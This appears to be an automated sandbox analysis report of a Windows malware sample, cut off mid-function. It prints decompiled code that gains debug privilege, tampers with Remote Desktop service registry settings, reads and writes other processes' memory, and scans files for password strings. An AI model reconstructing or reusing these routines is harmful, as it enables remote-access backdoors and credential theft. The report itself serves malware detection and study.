                                  • Opcode Fuzzy Hash: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction Fuzzy Hash: B2119071904218BBC7119BB2DC49DDF3FBDEF853607118176F902E2250DB78AE04CAA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DD72, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 324COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0040DD72(struct _CRITICAL_SECTION* __ecx, void* __edx) {
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				int _t102;
				int _t103;
				int _t106;
				int _t107;
				void* _t109;
				void* _t110;
				int _t111;
				int _t113;
				int _t114;
				int _t120;
				void* _t121;
				int _t159;
				void* _t172;
				int _t181;
				int _t182;
				signed int _t203;
				char* _t233;
				intOrPtr _t244;
				void* _t248;
				char* _t251;
				void* _t264;
				struct _CRITICAL_SECTION* _t267;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				void* _t281;

				_t264 = __edx;
				_t205 = __ecx;
				_t281 = (_t279 & 0xfffffff8) - 0x5c;
				_t267 = __ecx;
				_t203 = 0;
				_v84 = 0;
				_v80 = 0;
				_v96 = 0;
				EnterCriticalSection(__ecx);
				if(E00411177(_t205) == 1) {
					_t205 =  &_v96;
					E00410CFF( &_v96);
				}
				_t270 = _t267 + 0x38;
				_t102 = PathFileExistsW( *(_t267 + 0x38));
				_t283 = _t102;
				if(_t102 != 0) {
					L14:
					_t271 = _t267 + 0x3c;
					_t103 = PathFileExistsW( *(_t267 + 0x3c));
					__eflags = _t103;
					if(_t103 != 0) {
						L20:
						E0040DB52(_t267, _t264);
						E0040DB39(_t267);
						_t208 = _t267;
						_t106 = E0040D8FB(_t267);
						__eflags = _t106;
						if(_t106 != 0) {
							_t209 = _t267;
							_t107 = E0040D856(_t267, _t264, _t208);
							__eflags = _t107;
							if(_t107 != 0) {
								E0040DAD6(_t209);
								_t109 = E004036F7( &_v92, L"SeDebugPrivilege");
								_t110 = GetCurrentProcess();
								_t265 = _t109;
								_t111 = E00410B38(_t110, _t109);
								E00405FEB(_v96);
								__eflags = _t111;
								if(_t111 != 0) {
									_t213 =  *(_t267 + 0x2c);
									_t113 = E0041229C( *(_t267 + 0x2c));
									__eflags = _t113;
									if(_t113 != 0) {
										Sleep(0x3e8);
										_t114 =  *(_t267 + 0x4c);
										__eflags = _t114;
										if(_t114 != 0) {
											_t276 = _t203;
											__eflags = _t276 - _t114;
											do {
												E00405DE9(_t213 & 0xffffff00 | __eflags > 0x00000000);
												E0040373F( &_v92,  *((intOrPtr*)(_t267 + 0x44)) + _t276 * 4);
												E0040D3A8( &_v96);
												_t213 = _v100;
												E00405FEB(_v100);
												_t276 = _t276 + 1;
												_v100 = _t203;
												__eflags = _t276 -  *(_t267 + 0x4c);
											} while (_t276 <  *(_t267 + 0x4c));
										}
										Sleep(0x1f4);
										E0040373F( &_v92, _t267 + 0x28);
										E0040D3A8( &_v96);
										_t215 = _v100;
										E00405FEB(_v100);
										Sleep(0x1f4);
										_t120 = E0040D4DB(_t265, __eflags, _v100);
										__eflags = _t120;
										if(_t120 != 0) {
											_t121 = E00411177(_t215);
											__eflags = _t121 - 1;
											if(_t121 == 1) {
												E00410CD8(_v96);
											}
											E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68, _t203, _t267 + 0x5c, _t267 + 0x60));
											E00404C3B( &_v84);
											LeaveCriticalSection(_t267);
											_t203 = 8;
										} else {
											_push(_t267 + 0x60);
											_push(_t267 + 0x5c);
											_push(7);
											goto L34;
										}
									} else {
										E00410CD8(_v96);
										_push(_t267 + 0x60);
										_push(_t267 + 0x5c);
										_push(5);
										goto L34;
									}
								} else {
									E00410CD8(_v96);
									_push(_t267 + 0x60);
									_push(_t267 + 0x5c);
									_push(3);
									goto L34;
								}
							} else {
								E00410CD8(_v96);
								_push(_t267 + 0x60);
								_push(_t267 + 0x5c);
								_push(6);
								goto L34;
							}
						} else {
							E00410CD8(_v96);
							_push(_t267 + 0x60);
							_push(_t267 + 0x5c);
							_push(4);
							L34:
							E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68));
							E00404C3B( &_v84);
							LeaveCriticalSection(_t267);
						}
					} else {
						E0040373F(_t281, _t271);
						E00411722( &_v32, __eflags, _t205, _t203);
						_t232 =  *((intOrPtr*)(_t267 + 0x58));
						E00415847( *((intOrPtr*)(_t267 + 0x58)), _t264,  &_v88,  *((intOrPtr*)(_t267 + 0x64)), 3);
						__eflags = _v100 - _t203;
						if(_v100 != _t203) {
							_t233 =  &_v28;
							_t159 = E0041130F(_t233, _t232, _t232);
							__eflags = _t159;
							if(_t159 != 0) {
								_push(_t233);
								E0041165C( &_v28,  &_v76);
								E00411644( &_v36);
							}
							E00403148( &_v76);
							E0041140C( &_v28, __eflags);
							goto L20;
						} else {
							E00403148( &_v76);
							goto L8;
						}
					}
				} else {
					E0040373F(_t281, _t270);
					E00411722( &_v32, _t283, _t205, _t203);
					E0040373F(_t281, _t267 + 0x40);
					E00411722( &_v68, _t283,  &_v32, _t203);
					_v116 = _t203;
					_v112 = _t203;
					_v100 = _t203;
					_v96 = _t203;
					_t172 = E00411177( &_v68);
					_t244 =  *((intOrPtr*)(_t267 + 0x58));
					if(_t172 != 1) {
						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 1));
						E00403148( &_v84);
						_t278 = _v100;
						E004030CC( &_v108, _t278, 0x12e00);
						_t248 = _t278 + 0x12e00;
						_t179 = _v104 + 0xfffed200;
						__eflags = _v104 + 0xfffed200;
					} else {
						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 2));
						E00403148( &_v84);
						_t278 = _v100;
						E004030CC( &_v108, _t278, 0x1c800);
						_t248 = _t278 + 0x1c800;
						_t179 = _v104 + 0xfffe3800;
					}
					E004030CC( &_v76, _t248, _t179);
					_t285 = _t278;
					if(_t278 != 0) {
						_t250 =  &_v28;
						_t181 = E0041130F(_t250,  &_v76,  &_v76);
						__eflags = _t181;
						if(_t181 != 0) {
							_push(_t250);
							E0041165C( &_v28,  &_v92);
							_t250 =  &_v36;
							E00411644( &_v36);
						}
						_t251 =  &_v52;
						_t182 = E0041130F(_t251, _t250, _t250);
						__eflags = _t182;
						if(_t182 != 0) {
							_push(_t251);
							E0041165C( &_v52,  &_v76);
							E00411644( &_v60);
						}
						E00403148( &_v76);
						E00403148( &_v92);
						E0041140C( &_v52, __eflags);
						_t205 =  &_v28;
						E0041140C( &_v28, __eflags);
						goto L14;
					} else {
						E00403148( &_v76);
						E00403148( &_v92);
						E0041140C( &_v52, _t285);
						L8:
						E0041140C( &_v28, _t285);
						_t203 = _t203 | 0xffffffff;
					}
				}
				E00403148( &_v84);
				return _t203;
			}














































                                  0x0040dd72
                                  0x0040dd72
                                  0x0040dd78
                                  0x0040dd7e
                                  0x0040dd80
                                  0x0040dd83
                                  0x0040dd87
                                  0x0040dd8b
                                  0x0040dd8f
                                  0x0040dd9d
                                  0x0040dd9f
                                  0x0040dda3
                                  0x0040dda3
                                  0x0040dda8
                                  0x0040ddad
                                  0x0040ddb3
                                  0x0040ddb5
                                  0x0040df34
                                  0x0040df34
                                  0x0040df39
                                  0x0040df3f
                                  0x0040df41
                                  0x0040dfb5
                                  0x0040dfb7
                                  0x0040dfbe
                                  0x0040dfc3
                                  0x0040dfc5
                                  0x0040dfca
                                  0x0040dfcc
                                  0x0040dfe7
                                  0x0040dfe9
                                  0x0040dfee
                                  0x0040dff0
                                  0x0040e00a
                                  0x0040e018
                                  0x0040e01f
                                  0x0040e025
                                  0x0040e029
                                  0x0040e034
                                  0x0040e039
                                  0x0040e03b
                                  0x0040e055
                                  0x0040e058
                                  0x0040e05d
                                  0x0040e05f
                                  0x0040e084
                                  0x0040e086
                                  0x0040e089
                                  0x0040e08b
                                  0x0040e08d
                                  0x0040e08f
                                  0x0040e091
                                  0x0040e094
                                  0x0040e0a4
                                  0x0040e0ae
                                  0x0040e0b3
                                  0x0040e0b7
                                  0x0040e0bf
                                  0x0040e0c0
                                  0x0040e0c4
                                  0x0040e0c4
                                  0x0040e0c8
                                  0x0040e0d3
                                  0x0040e0dd
                                  0x0040e0e7
                                  0x0040e0ec
                                  0x0040e0f0
                                  0x0040e0fa
                                  0x0040e0fd
                                  0x0040e102
                                  0x0040e104
                                  0x0040e134
                                  0x0040e139
                                  0x0040e13c
                                  0x0040e142
                                  0x0040e142
                                  0x0040e15d
                                  0x0040e166
                                  0x0040e16c
                                  0x0040e174
                                  0x0040e106
                                  0x0040e109
                                  0x0040e10d
                                  0x0040e10e
                                  0x00000000
                                  0x0040e10e
                                  0x0040e061
                                  0x0040e065
                                  0x0040e06d
                                  0x0040e071
                                  0x0040e072
                                  0x00000000
                                  0x0040e072
                                  0x0040e03d
                                  0x0040e041
                                  0x0040e049
                                  0x0040e04d
                                  0x0040e04e
                                  0x00000000
                                  0x0040e04e
                                  0x0040dff2
                                  0x0040dff6
                                  0x0040dffe
                                  0x0040e002
                                  0x0040e003
                                  0x00000000
                                  0x0040e003
                                  0x0040dfce
                                  0x0040dfd2
                                  0x0040dfda
                                  0x0040dfde
                                  0x0040dfdf
                                  0x0040e110
                                  0x0040e11d
                                  0x0040e126
                                  0x0040e12c
                                  0x0040e12c
                                  0x0040df43
                                  0x0040df48
                                  0x0040df51
                                  0x0040df56
                                  0x0040df63
                                  0x0040df68
                                  0x0040df6c
                                  0x0040df7e
                                  0x0040df82
                                  0x0040df87
                                  0x0040df89
                                  0x0040df8b
                                  0x0040df95
                                  0x0040df9e
                                  0x0040df9e
                                  0x0040dfa7
                                  0x0040dfb0
                                  0x00000000
                                  0x0040df6e
                                  0x0040df72
                                  0x00000000
                                  0x0040df72
                                  0x0040df6c
                                  0x0040ddbb
                                  0x0040ddc0
                                  0x0040ddc9
                                  0x0040ddd6
                                  0x0040dddf
                                  0x0040dde4
                                  0x0040dde8
                                  0x0040ddec
                                  0x0040ddf0
                                  0x0040ddf4
                                  0x0040ddf9
                                  0x0040de03
                                  0x0040de57
                                  0x0040de60
                                  0x0040de65
                                  0x0040de73
                                  0x0040de7c
                                  0x0040de82
                                  0x0040de82
                                  0x0040de05
                                  0x0040de15
                                  0x0040de1e
                                  0x0040de23
                                  0x0040de31
                                  0x0040de3a
                                  0x0040de40
                                  0x0040de40
                                  0x0040de8d
                                  0x0040de92
                                  0x0040de94
                                  0x0040dec4
                                  0x0040dec8
                                  0x0040decd
                                  0x0040decf
                                  0x0040ded1
                                  0x0040dedb
                                  0x0040dee0
                                  0x0040dee4
                                  0x0040dee4
                                  0x0040deeb
                                  0x0040deef
                                  0x0040def4
                                  0x0040def6
                                  0x0040def8
                                  0x0040df02
                                  0x0040df0b
                                  0x0040df0b
                                  0x0040df14
                                  0x0040df1d
                                  0x0040df26
                                  0x0040df2b
                                  0x0040df2f
                                  0x00000000
                                  0x0040de96
                                  0x0040de9a
                                  0x0040dea3
                                  0x0040deac
                                  0x0040deb1
                                  0x0040deb5
                                  0x0040deba
                                  0x0040deba
                                  0x0040de94
                                  0x0040e179
                                  0x0040e186

                                  APIs
                                  • EnterCriticalSection.KERNEL32 ref: 0040DD8F
                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DF39
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DDAD
                                    • Part of subcall function 0041130F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 00411326
                                    • Part of subcall function 0041130F: GetLastError.KERNEL32(?,?,?,004091CE,?,?,?), ref: 00411334
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E12C
                                    • Part of subcall function 0040D856: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                  • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E01F
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E16C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 1717069549-2896544425
                                  • Opcode ID: bd499b9f6ca473f58f7055de6267ad5708b7c0db8c744d15ecef71a80a25f5d5
                                  • Instruction ID: 55d7e5f8d1f4b9ec0964da3279b74dcd5ea268b2ca2f52e34cb3dca68faebe82
                                  • Opcode Fuzzy Hash: bd499b9f6ca473f58f7055de6267ad5708b7c0db8c744d15ecef71a80a25f5d5
                                  • Instruction Fuzzy Hash: D0B13171504245ABC304EF62CC919EFB7A8BF54348F40093EF552A71D1EB78EA49CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB52, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040DB52(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E004036F7( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E00412569(_t96, E004036F7( &_v16, L"ImagePath"),  &_v36);
					E00405FEB(_v16);
					E00412554( &_v8);
					if(_t50 != 0) {
						E0040300A( &_v36,  &_v12);
						E004030FE( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E00412569(_t96, E004036F7( &_v16, L"ServiceDll"),  &_v36);
								E00405FEB(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E00403549(_t72 + 0x20, E004032E6( &_v16, E0040300A( &_v36,  &_v28), _t107));
									E00405FEB(_v16);
									_v16 = _v16 & 0x00000000;
									E00405FEB(_v28);
								}
								E00412554( &_v8);
							}
						}
						E00405FEB(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E00403148( &_v36);
				E00405FEB(_v20);
				E00405FEB(_v24);
				return E00412554( &_v8);
			}















                                  0x0040db52
                                  0x0040db5a
                                  0x0040db66
                                  0x0040db69
                                  0x0040db76
                                  0x0040db7e
                                  0x0040db8b
                                  0x0040db9b
                                  0x0040dbb6
                                  0x0040dbc0
                                  0x0040dbc8
                                  0x0040dbcf
                                  0x0040dbdc
                                  0x0040dbe4
                                  0x0040dbfb
                                  0x0040dc2a
                                  0x0040dc41
                                  0x0040dc4b
                                  0x0040dc50
                                  0x0040dc52
                                  0x0040dc6e
                                  0x0040dc76
                                  0x0040dc7e
                                  0x0040dc82
                                  0x0040dc82
                                  0x0040dc8a
                                  0x0040dc8a
                                  0x0040dc2a
                                  0x0040dc92
                                  0x0040dc97
                                  0x0040dc97
                                  0x0040dbcf
                                  0x0040dc9e
                                  0x0040dca6
                                  0x0040dcae
                                  0x0040dcbe

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0040DB93
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • StrStrW.SHLWAPI(?,svchost.exe), ref: 0040DBF7
                                  • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DC05
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0040DC22
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DB6E
                                  • svchost.exe -k, xrefs: 0040DBFD
                                  • svchost.exe, xrefs: 0040DBEF
                                  • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DB5E
                                  • ImagePath, xrefs: 0040DBA5
                                  • ServiceDll, xrefs: 0040DC30
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                  • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                  • API String ID: 2246401353-3333427388
                                  • Opcode ID: 267ab6dd76fcee10b71947c6f5d4a8ed077f2564fa4eb50ba2571fe93be9b7af
                                  • Instruction ID: 0a0d703e0c22a180c861e42df2812f13597edfba14798331e50e127ee1e54c95
                                  • Opcode Fuzzy Hash: 267ab6dd76fcee10b71947c6f5d4a8ed077f2564fa4eb50ba2571fe93be9b7af
                                  • Instruction Fuzzy Hash: 4C41E631D00119ABDB15EBA2CD92EEEBB79AF14748F50006AF801B21D1EB785F45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410D2D, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 130comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                  • CoInitialize.OLE32(00000000), ref: 00410D4B
                                  • CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • VariantInit.OLEAUT32(?), ref: 00410DED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize$CreateInitInstanceSecurityVariant
                                  • String ID: G.@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                  • API String ID: 2382742315-1265846757
                                  • Opcode ID: 2d0637be91da55d673d647132b9be97ebe7005386fdf65ad1ddacfa9f9e613cc
                                  • Instruction ID: 842cc41d95007274ba15a25a83f44bddffeff0cfe444bad9149d26d573bd0b7d
                                  • Opcode Fuzzy Hash: 2d0637be91da55d673d647132b9be97ebe7005386fdf65ad1ddacfa9f9e613cc
                                  • Instruction Fuzzy Hash: B141FB70A00209BFCB10DB96CC48EDFBBBDEFC9B14B104459F515EB290D6B5A981CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EE24, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126filememoryinjectionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EE24(long* __ecx, void** __edx, long _a4) {
				long _v8;
				intOrPtr _v12;
				LONG* _v16;
				void* _t30;
				void _t32;
				void* _t35;
				int _t37;
				void* _t44;
				void* _t46;
				void* _t52;
				long _t62;
				void* _t63;
				struct _OVERLAPPED* _t74;

				_t60 = __ecx;
				_v12 = 0x426970;
				_t74 = 0;
				_v16 = 0;
				_t62 = __ecx[1];
				_t72 = __edx;
				_t30 =  *_t62;
				if(_t30 == 0) {
					_t63 = __edx[1];
					_t32 =  *_t63;
					if(_t32 == 0) {
						E0040102C( *__ecx,  *__edx, _a4);
						_t74 = 1;
						L22:
						return _t74;
					}
					_t35 = _t32 - 1;
					if(_t35 == 0) {
						_t37 = ReadProcessMemory( *( *(_t63 + 4)),  *__edx,  *__ecx, _a4, 0);
						L8:
						_t74 = _t37;
						goto L22;
					}
					if(_t35 != 5 || SetFilePointer( *( *(_t63 + 4)),  *__edx, 0, 0) == 0xffffffff) {
						goto L22;
					} else {
						_t37 = ReadFile( *( *(_t72[1] + 4)),  *_t60, _a4,  &_v8, 0);
						goto L8;
					}
				}
				_t44 = _t30 - 1;
				if(_t44 == 0) {
					if( *(__edx[1]) != 0) {
						L11:
						_t46 = LocalAlloc(0x40, _a4);
						_v16 = _t46;
						if(_t46 != 0) {
							if(E0040EE24( &_v16, _t72, _a4) != 0) {
								_t74 = E0040EE24(_t60,  &_v16, _a4);
							}
							LocalFree(_v16);
						}
						goto L22;
					}
					_t37 = WriteProcessMemory( *( *(_t62 + 4)),  *__ecx,  *__edx, _a4, 0);
					goto L8;
				}
				_t52 = _t44;
				if(_t52 == 0) {
					goto L11;
				}
				if(_t52 != 3) {
					goto L22;
				}
				if( *(__edx[1]) != 0) {
					goto L11;
				}
				if( *__ecx == 0 || SetFilePointer( *( *(_t62 + 4)),  *__ecx, 0, 0) != 0) {
					_t37 = WriteFile( *( *(_t60[1] + 4)),  *_t72, _a4,  &_v8, _t74);
					goto L8;
				} else {
					goto L22;
				}
			}
















                                  0x0040ee2b
                                  0x0040ee2d
                                  0x0040ee35
                                  0x0040ee37
                                  0x0040ee3a
                                  0x0040ee3e
                                  0x0040ee42
                                  0x0040ee44
                                  0x0040eefe
                                  0x0040ef03
                                  0x0040ef05
                                  0x0040ef61
                                  0x0040ef6b
                                  0x0040ef6c
                                  0x0040ef72
                                  0x0040ef72
                                  0x0040ef07
                                  0x0040ef0a
                                  0x0040ef4f
                                  0x0040ee98
                                  0x0040ee98
                                  0x00000000
                                  0x0040ee98
                                  0x0040ef0f
                                  0x00000000
                                  0x0040ef25
                                  0x0040ef37
                                  0x00000000
                                  0x0040ef37
                                  0x0040ef0f
                                  0x0040ee4a
                                  0x0040ee4d
                                  0x0040eea4
                                  0x0040eebb
                                  0x0040eec0
                                  0x0040eec6
                                  0x0040eecb
                                  0x0040eee1
                                  0x0040eef1
                                  0x0040eef1
                                  0x0040eef6
                                  0x0040eef6
                                  0x00000000
                                  0x0040eecb
                                  0x0040eeb3
                                  0x00000000
                                  0x0040eeb3
                                  0x0040ee50
                                  0x0040ee53
                                  0x00000000
                                  0x00000000
                                  0x0040ee58
                                  0x00000000
                                  0x00000000
                                  0x0040ee63
                                  0x00000000
                                  0x00000000
                                  0x0040ee67
                                  0x0040ee92
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                  • WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                  • LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                  • LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                  • ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                  • ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$LocalMemoryPointerProcessReadWrite$AllocFree
                                  • String ID: `@
                                  • API String ID: 3276737649-951712118
                                  • Opcode ID: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction ID: e72bb7fa78d81cf8525c6baf04ae928c9dbf0452580219fbc960ee642851fe31
                                  • Opcode Fuzzy Hash: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                  • Instruction Fuzzy Hash: B5415B35100016FFCB128FAACD8489ABFB5FF0A35071485A2F509EA2B0D736D920DF89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409244, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 229fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E00409244(intOrPtr __ecx, CHAR* _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _t96;
				void* _t102;
				char _t104;
				void* _t125;
				intOrPtr _t127;
				char _t128;
				long _t133;
				void* _t135;
				intOrPtr _t136;
				void* _t141;
				void* _t146;
				void* _t147;
				intOrPtr* _t165;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr _t175;
				intOrPtr* _t177;
				CHAR* _t178;
				void* _t179;
				void* _t180;

				_v36 = __ecx;
				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t174 != 0xffffffff) {
					_t133 = GetFileSize(_t174, 0);
					_v16 = _t133;
					_t172 = E00401085(_t133);
					_v32 = _t172;
					E00401052(_t172, 0, _t133);
					_v24 = _v24 & 0x00000000;
					_t180 = _t179 + 0x10;
					ReadFile(_t174, _t172, _t133,  &_v24, 0);
					CloseHandle(_t174);
					_t175 = E00405FFA(0x400000);
					_v28 = _t175;
					_a4 = E00405FFA(0x104);
					_t96 = E00405FFA(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t135 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						E00405FEB(_a4);
						E00405FEB(_v12);
						E00405FEB(_t175);
						return E00401099(_t172);
					} else {
						goto L3;
					}
					do {
						L3:
						_t167 =  *((intOrPtr*)(_t135 + _t172));
						_t13 = _t167 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t167 - 0x3d;
						if(_t167 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t175)) = _t167;
						_t141 = _t141 + 1;
						__eflags = _t167;
						if(_t167 != 0) {
							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
								__eflags =  *_t172 - 0xd0;
								_t102 = 2;
								_t146 = 9;
								_t103 =  !=  ? _t146 : _t102;
								_t168 = 0;
								_t147 = ( !=  ? _t146 : _t102) + _t135;
								_t104 =  *((intOrPtr*)(_t147 + _t172));
								__eflags = _t104 - 0x20;
								if(_t104 <= 0x20) {
									L35:
									_t60 =  &_v12; // 0x50
									__eflags = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									 *((char*)(_t168 +  *_t60)) = 0;
									E004034D1( &_v20,  *_t60);
									_t66 =  &_a4; // 0x50
									E004034D1( &_v16,  *_t66);
									E00403549( &_v44, E004031AF( &_v20, __eflags,  &_v32));
									E00405FEB(_v32);
									E00403549( &_v48, E004031AF( &_v16, __eflags,  &_v32));
									E00405FEB(_v32);
									_v40 = 5;
									E00403549( &_v52, E004036F7( &_v32, 0x417668));
									E00405FEB(_v32);
									E00401FF2(_t180 - 0x10,  &_v52);
									E00402028(_v36);
									E00405FEB(_v16);
									E00405FEB(_v20);
									E00401441( &_v52);
									goto L36;
								}
